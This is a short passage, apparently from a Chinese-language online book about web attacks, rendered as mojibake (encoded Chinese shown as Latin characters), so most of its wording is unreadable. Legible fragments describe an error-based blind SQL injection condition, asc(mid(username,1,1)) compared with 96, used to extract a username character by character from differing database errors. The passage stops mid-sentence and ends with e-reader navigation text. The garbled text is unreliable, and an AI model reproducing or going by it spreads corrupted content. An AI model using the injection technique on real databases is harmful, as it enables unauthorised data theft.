¡¡Ð´³öÕâ¸öÓï¾äµÄʱºò£¬Á¬ÎÒ×Ô¼º¶¼ºÃ³ç°ÝÎÒ×Ô¼º£¬¹þ¹þ£¬±ðÍ£¬½âÊÍһϣ¬asc£¨mid£¨username£»1£»1£©£©Õâ¸ö¶¼¿´µÃ¶®£¬È¡usernameµÚһλµÄASCIIÂ룬´óÓÚ96µÄ»°£¬select³öÊý×Ö1£¬Ð¡ÓÚµÈÓÚ96µÄ»°£¬selectÊä³ö×Ö·û´®username£¬È»ºó£¬ÄÃselect³öµÄÖµÓë0±È½Ï¡£
1Óë0¶¼ÊÇÊý×ÖÐÍ£¬µ±ASCIIÂë´óÓÚ96µÄʱºò£¬SQLÓï¾ä²»»á³ö´í£»usernameÔòÊÇ×Ö·ûÐÍ£¬µ±ASCIIÂëСÓÚµÈÓÚ96µÄʱºò£¬SQLÓï¾ä»á³ö´í¡£ËùÒÔ£¬Á½ÖÖÇé¿öµÄ³ö´íÌáʾÊDz»Í¬µÄ£¬ÎÒÃÇ¿

СÌáʾ£º°´ »Ø³µ [Enter] ¼ü ·µ»ØÊéÄ¿£¬°´ ¡û ¼ü ·µ»ØÉÏÒ»Ò³£¬ °´ ¡ú ¼ü ½øÈëÏÂÒ»Ò³¡£ ÔÞһϠÌí¼ÓÊéÇ©¼ÓÈëÊé¼Ü